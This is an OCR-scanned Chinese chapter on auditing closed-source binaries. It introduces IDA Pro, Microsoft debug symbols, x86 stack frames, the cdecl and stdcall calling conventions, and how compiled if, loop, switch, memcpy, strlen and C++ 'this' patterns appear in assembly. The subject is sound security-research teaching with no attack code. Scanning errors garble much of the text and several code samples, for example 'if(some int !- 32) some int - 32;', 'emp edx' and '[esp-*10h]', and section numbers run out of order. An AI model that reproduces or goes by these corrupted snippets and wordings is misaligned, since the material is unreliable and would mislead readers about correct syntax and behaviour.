在 过 去 的 10 年 中 ,我们 欣喜 地 看 到 软件 的 安全 性 正 呈 指数 趋势 增长 。 但 从 另 一 方面 来 看 ,发 
现 和 利用 漏洞 的 技术 也 在 按 指数 规律 增长 。 虽 然 缓冲 区 溢出 之 类 的 漏洞 在 大 型 软件 里 已 不 多 见 
了 ， 然 而 又 有 新 漏洞 〈 如 整数 的 算术 问题 ) 初 现 江 湖 。 这 些 问 题 可 能 早 就 存在 了 ， 只 不 过 最 近 才 
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被 发 现 而 已 。 

手工 审计 费时 费力 ， 如 果 想 找到 复杂 的 漏洞 ， 可 能 需要 花 很 多 时 间 ， 因 此 ， 许 多 审计 者 正在 
提高 审计 的 自动 化 程度 。 随 着 模糊 测试 的 出 现 ， 安 全 研究 者 迎 来 了 漏洞 挖掘 的 春天 ， 他 们 现在 在 
梦 中 都 有 可 能 会 发 现 新 漏洞 ， 这 也 使 他 们 可 以 同时 完成 更 多 的 审计 任务 。 

我 们 相信 ， 在 接 下 来 的 10 年 中 ,混合 审计 技术 将 变 得 非常 常见 。 而 解决 方案 也 不 再 是 个 人 的 
杰作 了 ， 它 通常 由 一 组 程序 员 来 开发 、 维 护 ， 每 个 人 负责 其 中 的 一 部 分 ， 这 样 一 来 ， 就 能 十 分 迅 
速 地 审计 应 用 程序 了 。 可 以 预计 在 不 久 的 将 来 ， 这 种 系统 将 日 趋 完善 ， 甚 至 可 以 加 固 软件 产品 ， 
使 软件 的 安全 性 达到 可 以 接受 的 程度 。 如果 能 实现 这 个 目标 ,我 们 就 不 必 担 心 会 再 次 出 现 墙 塞 整 
个 互联 网 的 蠕虫 了 。 
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VE samt 泛 使 用 的 代码 库 没 有 公开 源 代 码 ， 其 中 包括 那些 占 统治 地 位 的 
Y 服务 器 和 桌面 操作 系统 。 评估 未 公开 源码 软件 的 安全 性 超出 了 模糊 测试 的 范畴 , 因此 ， 
必须 进行 二 进 制 审计 。 

一 般 认 为 二 进 制 审计 比 源码 审计 要 难 一 些 。 这 种 观点 对 初学 者 来 说 ， 亦 好 亦 不 好 。 说 它 好 是 
因为 很 少 有 人 及 时 审计 二 进 制 文件 ， 也 就 很 少 关注 它 ， 这 样 一 来 ， 我 们 发 现 漏洞 的 机 会 就 会 多 一 
些 。 如 今 ， 许 多 漏洞 在 开源 软件 里 已 经 看 不 到 了 ， 但 它们 仍 潜伏 在 未 公开 源码 的 商业 代码 库 中 。 

到 目前 为 止 ， 二 进 制 审计 的 技术 还 不 完善 。 很 多 漏洞 通过 源码 审计 可 以 轻松 得 到 验证 ， 而 用 
二 进 制 审计 时 却 难以 确定 。 但 在 工具 的 辅助 下 ， 通 过 不 断 的 实践 ， 二 进 制 审计 技术 已 有 了 很 大 提 
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安全 检查 语句 可 能 会 对 应 好 几 条 汇编 指令 。 因 此 ， 在 审计 函数 时 ,一定 要 保持 程序 在 执行 的 动态 
意识 。 例 如 ,通常 有 必要 知道 程序 执行 到 某 一 点 时 寄存 器 里 保存 的 数据 ， 在 任何 代码 段 里， 许多 
值 可 能 被 压 入 或 弹出 到 特定 的 寄存 器 。 

有 些 漏洞 在 二 进 制 和 源码 里 都 能 很 容易 地 找到 ， 然 而 ， 对 那些 第 一 次 审计 二 进 制 的 人 来 说 ， 
很 多 错误 可 能 很 麻烦 或 很 难 检测 到 。 但 当 你 熟悉 二 进 制 码 的 结构 后 ， 审 计 二 进 制 将 会 变 得 和 审计 
源码 一 样 容易 。 


21.2 IDA pro 一 一 商业 工具 


IDA Pro (Interactive Dis Assembler Pro) 是 公认 最 好 的 分 析 和 审计 二 进 制 的 工具 。 它 由 Belgian 
公司 Datarescue 部 门 Cwww.datarescure.com) 开发 并 销售 ， 价 格 还 算 人 合理。 如果 你 准备 经 常 审计 
二 进 制 ， 应 当 考 虑 购买 。 尽 管 IDA Pro 也 有 缺点 ， 但 瑕 不 掩 瑜 ， 它 目前 仍 是 最 好 的 反 汇 编 工 具 ， 
比 同类 产品 领先 很 多 。 

IDA Pro 支 持 多 种 硬件 平台 上 的 多 种 二 进 制 格式 ， 甚 至 支持 一 些 平时 很 少见 的 格式 。 它 允许 
我 们 命名 或 重 命名 目标 程序 的 每 个 部 分 ,并 将 反 汇 编 后 的 程序 输出 到 数据 文件 。 当 你 分 析 复 杂 的 
代码 结构 时 ， 注 释 非 常 有 用 。 和 许多 其 他 反 汇 编 工具 一 样 ，IDA Pro 可 以 列 出 多 条 代码 或 数据 的 
字符 串 及 交叉 引用 。 

21.2.1 IDA 特征 简介 

对 IDA Pro 有 基本 的 了 解 就 可 以 为 二 进 制 分 析 提 供 很 大 的 帮助 ， 对 那些 刚 接触 二 进 制 审计 的 
人 来 说 ， 显 然 没 必要 一 口气 掌握 IDA Pro 的 全 部 特性 。 

IDA Pro 的 主 视图 (View-A) 是 反 汇 编 视图 ， 主 要 显示 反 汇 编 后 的 指令 。 

IDA Pro 用 颜色 区 分 不 同 的 内 容 ， 使 之 看 起 来 更 明显 一 些 。 常 量 是 绿色 的 ， 命 名 的 变量 是 蓝 
色 的 ， 导 入 函数 是 粉红 的 ， 大 部 分 的 代码 是 深蓝 的 。 当 你 把 鼠标 指向 特定 的 字符 串 时 ，IDA Pro 
会 用 高 亮度 黄色 把 视图 里 相同 的 字符 串 标识 出 来 ( 当 你 试图 在 大 块 代码 里 定位 特殊 地 址 或 寄存 器 
引用 时 ， 这 将 非常 有 帮助 )。 主 视图 逐个 显示 函数 的 代码 ， 而 且 也 用 颜色 区 分 程序 的 各 组 成 部 分 : 
属于 有 效 函 数 的 代码 区 域 的 地 址 是 黑色 的 , 不 属于 任何 函数 的 代码 区 域 的 地 址 是 柠 色 的 ， 导入 数 
据 的 地 址 〈IAT 或 idata) 是 粉红 的 ， 只 读数 据 的 地 址 是 灰色 的 ， 可 写 数据 的 地 址 是 黄色 的 。 

IDA Pro 还 有 hex-view,. 可 以 查看 用 十 六 进 制 表示 的 代码 和 字符 串 。name 窗 口 列 出 程序 中 所 
有 已 命名 变量 的 位 置 ，function 窗 口 列 出 所 有 已 识别 的 函数 ，string 窗 口 列 出 程序 中 所 有 的 字符 串 。 
还 有 其 他 一 些 窗口 ， 例 如 structure 窗 口 、enumeration 窗 口 等 。 可 以 在 这 些 窗口 里 找到 绝 大 多 数 需 
要 的 信息 。 

IDA Pro 将 保存 被 跳 转 、 调 用 或 数据 引用 指向 的 代码 的 交叉 引用 。 当 在 任何 位 置 反 向 跟踪 热 
行 流 时 ， 这 会 对 我 们 有 所 帮助 。 它 也 可 能 把 局 部 栈 解 释 为 函数 。IDA Pro 可 以 正确 识别 出 带 标准 
栈 帧 的 函数 ， 但 由 于 有 些 函 数 被 优化 而 缺少 帧 指针 ， 所 以 ， 它 偶尔 也 会 出 错 。 

IDA Pro 可 以 命名 程序 里 的 任何 位 置 ， 也 可 以 在 任何 地 方 加 注释 。 这 使 代码 分 析 变 得 更 简单 
也 更 容易 ， 当 我 们 一 觉醒 来 ， 仍 记得 接 下 去 要 做 什么 。 自 4.2 版 本 以 来 ， IDA Pro 增 加 了 不 少 功能 ， 
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比如 说 ， 以 图 形 化 的 方式 表示 代码 结构 。 在 许多 情形 下 ， 这 个 功能 是 非常 有 用 的 。IDA Pro 有 一 
些 非 常 有 用 的 第 三 方 插件 ， 但 遗憾 的 是 ， 很 多 插件 不 是 为 二 进 制 审计 而 设计 的 。 

IDA pro 人 允许 用 户 指定 数据 类 型 。 尽 管 它 尽 最 大 努力 推测 遇 到 的 数据 是 代码 、 二 进 制 、 字 符 
串 或 是 其 他 的 类 型 ， 但 它 不 可 能 每 次 都 猜 对 。 如 果 显示 的 内 容 不 太 对 动 ， 用 户 可 以 自行 修改 。 


21.2.2 ”调试 符号 

微软 为 每 个 主要 版 本 的 Windows 都 提供 了 符号 文件 。 这 些 文件 可 以 从 微软 的 Windows 硬 件 和 
驱动 中 心 页 面 《www.microsoftcom/whdc/hwdev) 下 载 ， 在 分 析 Windows 二 进 制 时 ， 这 些 符号 文 
件 非 常 有 用 。 符 号 文件 通常 以 PDB 文件 的 形式 发 布 ， 那 是 MSVC++ 生 成 的 程序 数据 库 格式 。 这 些 
文件 几乎 包含 了 二 进 制 文件 中 每 个 函数 的 函数 名 及 地 址 。 对 某 些 二 进 制 文件 来 说 ， 它 的 PDB 文件 
甚至 还 包含 了 未 公开 的 内 部 结构 和 局 部 变量 的 名 称 。 当 每 个 符号 都 对 应 有 意义 的 名 称 时 ， 理 解 二 
进 制 文 件 就 容易 多 了 。 

微软 基于 SP 发 布 符号 文件 ， 而 不 是 每 个 热点 补丁 都 有 符号 文件 。 几 乎 操作 系统 内 核 包 括 的 
每 个 应 用 程序 、 函 数 库 和 驱动 程序 都 有 对 应 的 符号 文件 。IDA Pro 可 以 导入 PDB 文件 ， 重 命名 一 
进 制 中 所 有 的 函数 。 另 外 ， 还 有 一 些 第 三 方 工具 ， 如 PdbDump 可 以 解释 PDB 文件 ， 并 从 中 提取 有 
用 的 信息 。 
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为 了 胜任 审计 二 进 制 的 工作 ,你 必须 正确 理解 编译 器 生成 的 代码 。 但 是 ， 大 部 分 编译 器 生成 
的 代码 结构 (特别 是 经 过 优化 以 后 的 ) 不 是 很 直观 。 本 节 将 介绍 大 部 分 二 进 制 文件 里 的 标准 代码 
结构 以 及 一 些 经 常 遇 到 的 非 标准 代码 结构 ， 目 的 是 使 编译 后 的 代码 像 源 码 一 样 易于 理解 。 


21.3.4 栈 帧 

理解 函数 的 栈 帧 布局 就 会 更 容易 理解 汇编 代码 , 而 且 在 某 些 情况 下 , 还 可 以 帮助 我 们 迅速 判 
断 是 否 存在 基于 栈 的 溢出 。 尽 管 在 x86 上 有 一 些 常 见 的 栈 帧 布局 ， 但 它们 主要 由 编译 器 确定 ， 都 
不 太 标 准 。 下 面 介 绍 一 些 常见 的 栈 帧 布局 。 

1. 传统 的 基于 BP 的 栈 帧 

最 常见 的 栈 帧 布局 应 该 是 传统 的 基于 BP 的 帧 , 其 中 帧 指针 寄存 器 EBP 是 指向 前 一 个 栈 帧 的 常 
量 指针 。 相 对 于 函数 参数 和 局 部 栈 变量 的 访问 地 址 来 说 ， 这 个 帧 指针 也 是 常量 。 

在 mtel 的 表示 法 里 ， 使 用 传统 栈 帧 的 函数 的 prologue 如 下 所 示 。 


push ebp // save the old frame pointer to the stack 
mov ebp, esp // set the new frame pointer to esp 
sub esp, 5ch // reserve space for local variables 


在 这 里 ， 局 部 栈 变量 位 于 EBP 的 负 偏 移 位 置 ， 函 数 参 数位 于 正 偏 移 位 置 。EBp+8 是 函数 的 第 
一 个 参数 。IDA Pro 通 常 把 EBP+8 重 命名 为 EBP+arg 0。 

在 用 这 种 帧 类 型 的 函数 里 ， 几 乎 所 有 的 对 参数 和 局 部 栈 变量 的 引用 都 是 相对 于 这 个 帧 指针 
的 。 已 经 有 文档 详细 描述 了 这 种 栈 布局 ， 在 审计 时 可 以 遵照 执行 。MSVC++ 和 GCC 产 生 的 大 部 分 
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代码 都 用 这 种 栈 帧 。 

2. 没有 帧 指针 的 函数 

许多 编译 器 为 了 优化 代码 ， 可 能 会 生成 不 使 用 帧 指针 的 代码 。 在 某 些 情况 下 ， 编 译 器 甚至 把 
帧 指针 寄存 器 作为 普通 寄存 器 来 用 。 如 果 碰 到 这 种 情况 ， 函 数 将 以 栈 指针 Esp 为 参考 来 访问 参数 
利 局 部 变量 ， 而 不 是 以 帧 指针 为 参考 。 尽 管 帧 指针 在 传统 栈 帧 里 是 常量 ， 但 帧 指针 浮动 的 范围 贯 
穿 整个 函数 ， 在 每 次 压 入 或 弹出 时 ， 都 会 改变 。 下 面 的 例子 试图 说 明 这 个 问题 。 


this_function: 


push esi 

push edi 

push ebx 

push dword ptr [esp-*10h] // first argument to this function 
push dword ptr [esp+18h] // second argument to this function 


call some function 

当 第 一 次 调用 这 个 函数 时 ， 第 一 个 参数 保存 在 ESP 十 4。 保 存 3 个 寄存 器 之 后 ， 第 一 个 参数 的 
位 置 变 成 EsP+10h。 在 压 入 第 一 个 函数 参数 作为 some_function 的 参数 之 后 ， 第 二 个 函数 参数 定 
位 在 ESP+18h。 

IDA Pro 尝 试 在 函数 中 确定 给 定 栈 指针 的 位 置 。 为 了 做 到 这 一 点 ， 它 试 着 识别 栈 指针 访问 的 
有 关 数 据 真正 提 到 了 什么 。 然 而 ， 当 它 不 知道 外 部 函数 的 调用 约定 时 ， 可 能 会 得 到 错误 的 结果 ， 
并 生成 非常 混乱 的 反 汇 编 代 码 。 有 时 候 ， 为 了 确定 栈 缓冲 区 的 大 小 ， 可 能 有 必要 手工 计算 栈 指针 
在 函数 里 某 个 点 的 位 置 。 谢 天 谢 地 ， 这 样 的 混乱 不 会 经 常 发 生 。 

3. 非 传统 的 基于 BP 的 栈 帧 

微软 的 Visual Studio .NET 2003 有 时 会 生成 使 用 常量 帧 指针 栈 帧 的 代码 ， 尽 管 这 不 是 传统 的 
含义 。 当 这 个 帧 指针 是 常量 时 ， 所 有 访问 参数 和 局 部 变量 的 指令 都 和 它 相 关 ， 它 不 指向 调用 函数 
的 帧 指针 ， 而 可 能 位 于 传统 帧 指针 负 偏 移 的 位 置 。 一 个 函数 的 prologue 看 起 来 可 能 像 下 面 这 样 。 


push ebp 
lea ebp, [esp-5ch] 
sub esp, 98h 


函数 的 第 一 个 参数 位 于 EBP+64h, 而 不 是 传统 的 EBP+8。 从 EBP-3ch 到 EBP+5ch 的 范围 都 可 能 
被 局 部 栈 帧 占用 。 

可 以 在 Windows Server 2003 的 系统 函数 库 和 服务 程序 里 找到 包含 这 种 非 传统 的 基于 BP 的 帧 
的 代码 。 到 目前 为 止 ，IDA Pro 还 不 能 识别 这 样 的 代码 结构 ， 完 全 曲解 了 这 类 函数 的 局 部 栈 帧 。 
希望 在 不 久 的 将 来 ，IDA Pro 可 以 支持 编译 器 的 这 种 怪癖 。 
21.3.2 调用 约定 

程序 里 的 函数 可 能 使 用 不 同 的 调用 约定 , 特别 是 如 果 程 序 由 多 种 语言 写成 , 很 可 能 会 使 用 不 
则 的 调用 约定 。 理 解 基于 C 的 语言 里 的 调用 约定 对 我 们 审计 二 进 制 有 很 大 帮助 。 通 常 在 MSVC++ 
或 GCC 生成 的 C 或 C++ 代码 中 ， 经 常 看 到 的 调用 约定 只 有 两 种 。 
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1. C 调 用 约定 

C 调 用 约定 不 仅 是 C 代 码 调用 函数 的 方式 ， 也 是 传递 参数 、 恢 复 栈 的 方法 。 使 用 这 种 调用 约 
定 的 函数 把 参数 按 源码 中 的 排列 从 右 至 左 依次 压 入 栈 。 换 名 话说 ， 在 调用 前 ， 首 先 压 入 的 是 最 后 
一 个 参数 ， 然 后 是 倒数 第 二 个 ， 依 此 类 推 ， 最 后 压 入 的 是 第 一 个 参数 。 在 调用 返回 后 ， 调 用 函数 
将 恢复 它 的 栈 指 针 。C 调 用 约定 的 示例 如 下 : 

some_function(some_pointer,some_integer); 

当 用 C 调 用 约定 时 ， 函 数 调用 看 起 来 像 下 面 这 样 。 

push some_integer 

push some_pointer 


call some_function 
add esp, 8 


注意 ， 函 数 的 第 二 个 参数 在 第 一 个 参数 之 前 被 压 入 ， 调 用 函数 自己 恢复 栈 指针 。 因 为 这 个 函 
数 有 两 个 参数 ， 栈 指针 只 需 增 加 8B。 也 经 常 可 以 看 到 有 些 程序 用 x86 的 PoP 指 令 把 临时 寄存 器 作 
为 目的 地 来 恢复 栈 。 在 这 个 例子 里 ， 可 以 执行 两 条 POP ECx 指 令 来 恢复 栈 ， 每 次 恢复 4B。 

2. stdcall 调 用 约定 

此 外 , 在 C 和 C++ 代码 里 还 可 以 经 常 看 到 的 调用 约定 是 stdcal1。 它 传递 参数 的 方法 和 C 调 用 
约定 一 样 ， 在 函数 调用 前 ， 第 一 个 函数 参数 被 最 后 压 入 栈 ， 依 此 类 推 。 但 它 通 常 由 被 调用 函数 自 
己 恢复 栈 。 在 x86 上 ， 通 常用 返回 指令 释放 栈 空间 。 例 如 ， 有 3 个 参数 的 函数 在 使 用 stdcall 调 用 
约定 时 可 以 用 RET 0Ch 指 令 返 回 ， 这 条 指令 将 释放 栈 上 的 12B。 

因为 不 需要 调用 函数 释放 栈 空间 ， 所 以 通常 来 说 stacall 更 有 效率 一 些 。 然 而 ， 接 受 可 变数 
量 参数 的 函数 (例如 printf-like 函 数 ) 不 能 释放 被 它们 自己 参数 占用 的 栈 空间 ， 而 必须 由 调用 函 
数 来 完成 ， 因 为 只 有 调用 函数 知道 它 到 底 有 多 少 个 参数 。 
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1. 函数 布局 

编译 器 生成 的 函数 代码 布局 总 是 不 太 稳定 。 函 数 通常 由 prologue 开 始 ， 以 epilogue 和 return 结 
束 。 然 而 ， 函 数 不 一 定 非 要 以 return 结 束 ， 我 们 经 常 可 以 看 到 retum 指 令 之 后 还 有 其 他 代码 ， 这 些 
代码 最 终 会 跳 到 returm 指 令 。 尽 管 函 数 可 能 有 多 个 返回 点 ， 但 编译 器 将 优化 函数 ， 使 它 跳 到 公共 
的 返回 点 。 

从 Visual Studio 6 开始 ，MSVC++ 编 译 器 在 编译 代码 时 使 用 非常 不 规范 的 函数 布局 。 编 译 器 
使 用 某 种 逻辑 来 判断 程序 分 支 被 采用 的 可 能 性 。 那 些 被 认为 可 能 性 较 小 的 会 从 主 函 数 中 抽出 ， 放 
到 代码 段 中 很 偏僻 的 地 方 。 这样 的 代码 段 通常 由 那些 处 理 不 常见 的 错误 条 件 或 莫须有 情景 的 代码 
组 成 。 然 而 ， 在 这 些 代码 段 中 很 可 能 藏 有 漏洞 ， 因 此 ， 我 们 在 审计 二 进 制 时 不 应 该 忽视 它们 。 在 
IDA Pro 里 ， 通 常用 红色 转移 箭头 指示 这 些 代 码 段 ， 多 年 以 来 ， 这 已 成 为 MSVS++ 生 成 的 代码 的 
常见 部 分 了 。IDA Pro 不 能 适当 地 处 理 这 些 代码 段 ， 也 就 不 会 注意 到 它们 里 面 对 局 部 栈 变 量 的 访 
问 ， 也 不 能 正确 地 用 图 形 把 它们 显示 出 来 了 。 

在 高 度 优化 的 代码 里 ， 某 些 函 数 可 以 共享 代码 段 。 例 如 ， 如 果 某 些 函 数 以 同样 的 方式 返回 、 
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恢复 同样 的 寄存 器 和 栈 空间 ， 那 么 对 它们 来 说 ， 共 享 epilogue 和 retum 代 码 在 技术 上 是 可 行 的 。 然 
而 ， 这 种 情况 很 少见 ， 好 像 只 在 Windows NT 的 NTDLL 里 出 现 过 。 

2. iE 语 名 

:语句 是 最 常见 的 C 语 言 结构 ， 在 编译 后 的 代码 里 经 常 可 以 看 到 它们 。 它 们 在 汇编 之 后 的 最 
常见 表示 形式 是 ， 在 cMP 或 TEsT 指 令 之 后 紧 跟着 一 个 条 件 转 移 指 令 。 下 面 的 例子 显示 了 C it 语 名 
及 其 对 应 的 汇编 指令 。 

CAS: 


int some int; 


if(some int !- 32) 
some int - 32; 


编译 之 后 Cebp-4 = some int): 


mov eax, [ebp-4] 

cmp eax, 32 

jnz past next instruction 
mov eax, 32 


if 的 特征 一 般 是 前 向 转移 和 分 支 ， 不 过 也 不 一 定 ， 因 为 编译 器 重新 组 织 代码 后 ， 可 能 会 严 
重 破坏 这 样 的 结构 。 在 某 些 上 下 文 里 ，if 语 句 是 非常 明显 的 条 件 分 支 ， 但 在 另外 的 上 下 文 里 ， 却 
很 难 把 它 与 其 他 的 代码 结构 (如 循环 结构 ) 区 分 开 来 。 全面 理解 函数 的 结构 会 更 容易 发 现 if 语 句 。 

3. foz 和 while 循 环 

程序 的 循环 结构 通常 是 常见 漏洞 的 藏身 之 处 。 能 否 在 二 进 制 里 识别 它们 是 审计 的 关键 。 在 编 
译 后 的 代码 里 ， 很 难 分 辨 出 循环 的 类 型 ， 相 比 之 下 ， 识 别 它们 的 功能 要 简单 一 些 。 它 们 的 特征 一 
般 是 反 向 分 支 或 转移 ， 从 而 重复 执行 一 段 代码 。 下 面 举例 说 明 一 个 简单 的 while 循 环 结构 和 编译 
后 的 汇编 指令 。 

C 代 码 : 


char *ptr, *output, *outputend; 
while(*ptr) { 
*outputt+ = *ptrt+t+; 


if(output >= outputend) 
break; 


} 

编译 后 的 表示 (ecx = ptr, edx = output, ebp+8 = outputend) 
mov al, [ecx] 

test al, al 

jz loop_end 


mov [edx], al 
inc ecx 
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inc edx 


emp edx, [ebp+8] 
jae loop_end 
jmp loop_begin 


这 段 代码 和 简单 的 fcer 循 环 没什么 两 样 ， 很 难 确定 它 对 应 的 源码 是 何 种 语句 。 然 而 ， 代 码 的 
功能 比 表 现形 式 更 重要 9， 像 这 里 显示 的 循环 ， 在 缺乏 源码 的 程序 里 ， 通 常会 引发 很 多 错误 。 

4. switchi= 4] 

switch 语 句 对 应 的 汇编 代码 相当 复杂 ， 有 有 时候 甚至 会 觉得 有 些 怪异 。 根 据 实际 的 switch 语 
句 及 编译 器 的 处 理 方式 ， 它 们 在 编译 后 的 形式 可 能 是 多 种 多 样 的 。 

switch 语 句 可 以 被 等 同 地 分 解 成 低 效 的 if 语句， 在 某 些 情况 下 ， 有 些 编 译 器 的 确 是 这 样 做 
的 。 这 个 语句 本 身 可 能 很 好 理解 ， 读 这 段 代码 的 审计 者 可 能 都 会 认为 它 是 一 系列 的 i1£ 语 名 ,而 不 
会 怀疑 它 是 其 他 的 什么 东西 。 

如 果 switch 语 句 的 常量 表达 式 是 连续 的 ， 编 译 器 通常 生成 一 个 用 switch 的 常量 表达 式 作 索 
引 的 跳 转 表 。 这 是 处 理 连续 switch 语 句 非常 有 效 的 方法 ， 但 并 不 总 是 可 行 。 示 例如 下 。 

C 代 码 : 


int some_int, other_int; 
switch(some_int) { 


case 0: 
other_int = 0; 
break; 
case 1: 
other_int = 10; 
break; 
case 2: 
other_int = 30; 
break; 
default: 
other_int = 50; 
break; 


} 
编译 后 的 表示 (some int-eax, other int-ebx): 


cmp eax, 2 
ja default case 


jmp switch jmp table[eax*4]; 
case O0: 


xor ebx, ebx 
jmp end, switch 





(D 汇编 指令 对 应 的 是 for 循 环 还 是 while 循 环 并 不 重要 ， 重 要 的 是 它们 的 功能 。 译 者 注 
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case 1: 

mov ebx, 10 

jmp end switch 
case 2: 

mov ebx, 30 

jmp end switch 
default case: 

mov ebx, 50 
end switch: 


在 只 读 内 存 里 ， 可 以 发 现 数据 表 swithc_jmp_table, 其 中 包含 J 了 case_ 0、 case_1 和 case_2 


序列 的 偏 移 量 。 
IDA Pro 可 以 准确 识别 出 上 述 构 造 的 switch 语 句 ， 并 精确 告知 用 户 哪 种 常量 表达 式 可 以 被 哪 


在 switch 语 名 常量 表达 式 无 序 的 情况 下 ， 就 不 好 将 它们 做 成 跳 转 表 里 的 索引 了 。 在 这 时 ， 
编译 器 通常 用 一 个 结构 〈switch 在 此 处 被 递减 或 减 去 某 个 值 ， 直到 它 的 值 为 零 ) 匹配 switch 语 
名 的 值 。 这 样 switch 语 句 就 可 以 有 效 地 处 理 间隔 数值 的 cases 常 量 表达 式 。 例如 ， 如 果 一 个 
switch 语 句 准 备 处 理 的 case 常 量 表达 式 值 是 3、4、7 和 24， 那么 它 可 能 会 这 样 做 (EAX= case% 
量 表达 式 值 ): 


sub eax, 3 

jz case_three 

dec eax 

jz case_four 

sub eax, 3 

jz case_seven 

sub eax, 17 

jz case twenty four 
jmp default 


这 段 代 码 可 以 正确 处 理 所 有 可 能 的 switch 语 句 常 量 表达 式 及 默认 值 ， 一 般 可 以 在 MSVC 十 
十 编译 器 生成 的 代码 里 看 到 。 
21.3.4 3l memcpy 代码 构造 

许多 编译 器 会 对 memcpy 库 函数 进行 优化 ， 直 接 用 汇编 指令 蔡 换 它们 。 经 过 这 样 的 优化 后 的 
汇编 指令 比 函数 调用 更 有 效率 。 这 种 类 型 的 内 存 复制 操作 会 导致 缓冲 区 溢出 ,可 以 在 反 汇编 后 的 
清单 里 轻松 识别 出 来 。 使 用 的 指令 集 如 下 : 


mov esi, source_address 
mov ebx, ecx 


shr ecx, 2 // length divided by four 
mov edi, eax // destination address 
repe movsd // copy four byte blocks 
mov ecx, ebx 

and ecx, 3 // remainder size 

repe movsb // copy it 


在 这 种 情况 下 ， 数 据 从 源 寄存 器 BST 复 制 到 目标 寄存 器 EpI。 为 了 加 快速 度 ， 用 指令 repe 
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movsd 每 次 复制 4B。 这 把 4B 块 的 ECX 数 量 的 数据 从 ESI 复制 到 EDI， 这 就 是 为 什么 Ecx 中 的 长 度 是 
被 4 除 的。 这 个 repe movsb 指 令 复 制 剩 下 的 数据 。 

按照 同样 的 方式 ， 用 repe stosa 指 令 对 memset 进 行 优化 ，AL 寄 存 器 中 保存 着 memset 使 用 
的 字符 。 

memmove 没 有 照 这 样 被 优化 ， 主 要 是 怕 这 样 做 可 能 会 覆盖 到 其 他 的 数据 区 域 。 


21.3.5 ”类 似 stlen 的 代码 构造 

类 似 于 memcpy， 某 些 编译 器 通常 也 会 把 strlen 库 函数 优化 成 简单 的 x86 汇 编 指 令 。 这 样 将 节 
省 因为 函数 调用 带 来 的 系统 开销 。 某 些 不 常见 的 编译 器 在 处 理 strlen 时 ， 生成 的 代码 看 起 来 会 
有 些 奇 怪 。 通 常 看 起 来 像 下 面 这 样 : 


mov edi, string 
or ecx, Oxffffffff 


Xor eax, eax 
repne scasb 


not ecx 
dec ecx 


这 段 指 令 的 作用 是 把 字符 串 的 长 度 保存 到 Bcx 寄 存 器 。repne scasb 指 令 对 存储 在 Eax 低 位 
的 字符 从 EDpI 开 始 扫描 《在 本 例 中 Eax 低 位 是 零 )， 然 后 对 每 个 字符 进行 这 样 的 检查 ， 并 依次 递减 
ECX, XÉMÉEDI. 

在 repne scasb 操 作 结 束 的 地 方 ， 如 果 发 现 空 字 节 ，EpI 指 向 越过 空 字 节 的 字符 ，Ecx 的 值 
古 负 字 符 串 长 度 减 去 2。 递 减 之 后 对 BCcx 进 行 逻辑 非 运算 将 使 Bgcx 里 的 值 是 正确 的 字符 串 长 度 。 最 
常见 的 是 sub edi，ecx 指 令 后 面 紧 跟着 not ecx 指 令 ， 这 将 把 EDI 重 新 设 为 原来 的 位 置 。 

很 多 代码 都 使 用 这 段 代码 来 处 理 字符 串 数据 ， 因此， 你 应 该 可 以 认 出 它 ， 并 了 解 它 是 怎样 运 
行 的 。 
21.8. ”C++ 代码 构造 

如 今 的 多 数 没有 公开 源码 的 操作 系统 内 核 和 服务 程序 都 是 用 C++ 写 的 。C++ 代 码 构造 在 很 多 
方面 都 和 C 代 码 类 似 ， 调 用 约定 也 非常 相近 ,编译 器 一 般 都 同时 支持 C 和 C++， 并 使 用 同样 的 汇编 
代码 生成 引擎 。 然而, 在 审计 C++ 代 码 时 , 还 是 有 些 方面 不 太一 样 , 我 们 必须 注意 这 些 特殊 情况 。 
通常 ， 审 计 由 C++ 代码 生成 的 二 进 制 比 C 的 要 困难 得 多 ， 然 而 ， 在 熟悉 后 ， 它 们 之 间 的 差距 就 不 
是 那么 明显 了 。 
21.3.7 this 指针 

this 指 针 涉及 属于 当前 函数 (方法 ) 的 具体 的 类 实例 。this 必 须 经 由 它 的 调用 者 传 给 函数 ， 
不 过 不 能 把 它 作 为 函数 的 参数 来 传递 ， 而 是 通过 ECcx 寄 存 器 传递 this 指 针 。 在 C++ 里 使 用 的 这 种 
调用 约定 称 为 thiscall。 下 面 例子 显示 的 是 一 个 函数 把 类 指针 传递 给 另 一 个 函数 。 


push . edi 
push esi 
push [ebp*arg 0] 
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lea ecx, [ebx+5ch] 
call ?ParseInputGHTTP HEADERSQGQAEHPBDKPAKGZ 


可 见 ， 在 调用 函数 之 前 ， 指 针 保 存在 Ecx 寄 存 器 里 。 在 这 个 例子 里 ， 保 存在 Ecx 里 的 值 是 指 
向 HTTP_HEADERS 对 象 的 指针 。 因 为 Ecx 寄 存 器 经 常会 被 其 他 指令 使 用 ， 所 以 在 函数 调用 后 ， 通 常 
要 把 this 指 针 保 存在 另外 的 寄存 器 里 ， 但 它 经 常 通过 ecx 寄存 器 传递 。 


21.4 重 构 类 定义 


在 分 析 C++ 代 码 时 ， 深 入 了 解 对 象 的 结构 会 对 我 们 有 很 大 帮助 。 如 果 审 计 者 审查 的 是 错误 的 
地 方 ， 将 很 难 获得 这 些 信 息 ， 许 多 对 象 的 结构 很 复杂 ， 而 且 其 中 可 能 还 包含 有 奶 套 的 对 象 。 

重 构 对 象 的 常见 方法 是 找 出 访问 对 象 的 所 有 指针 ， 从 而 枚 举 类 成 员 。 在 很 多 情况 下 ， 只 能 推 
测 或 猜测 这 些 成 员 的 类 型 ， 但 在 某 些 情况 下 ， 你 可 以 通过 它们 是 否 是 已 知 函数 的 参数 或 者 通过 一 
些 熟 悉 的 上 下 文 来 确定 它们 。 

如 果 你 准备 动手 重 构 对 象 的 结构 ,最 好 先 找 出 这 个 类 的 构造 函数 和 析 构 函数 。 它们 分 别 是 初 
始 化 和 释放 对 象 的 函数 ， 因 此 ， 它 们 通常 会 访问 大 多 数 的 对 象 成 员 ， 从 而 揭示 许多 类 的 信息 ， 但 
对 我 们 来 说 ， 所 有 的 显示 信息 并 非 都 有 用 处 。 可 能 还 有 必要 研究 类 的 其 他 方法 ， 以 便 得 到 更 全 面 
的 对 象 信息 。 

如 果 程 序 带 有 符号 信息 ， 那 么 对 任何 程序 来 说 ， 基 本 上 都 能 迅速 发 现 构造 函数 和 析 构 函数 。 
它们 的 记号 是 classname: :Classname 和 Classname: :~Classname。 然 而 , 如 果 不 能 通过 它们 的 
名 字 来 发 现 它们 , 通常 就 只 能 通过 它们 的 结构 和 它们 引用 的 地 方 来 识别 它们 。 构 造 函数 通常 是 一 
段 线性 代码 ， 用 于 初始 化 大 量 的 结构 成 员 。 这 些 代 码 中 很 少 出 现 比较 或 条 件 转移 指令 ， 经常 把 结 
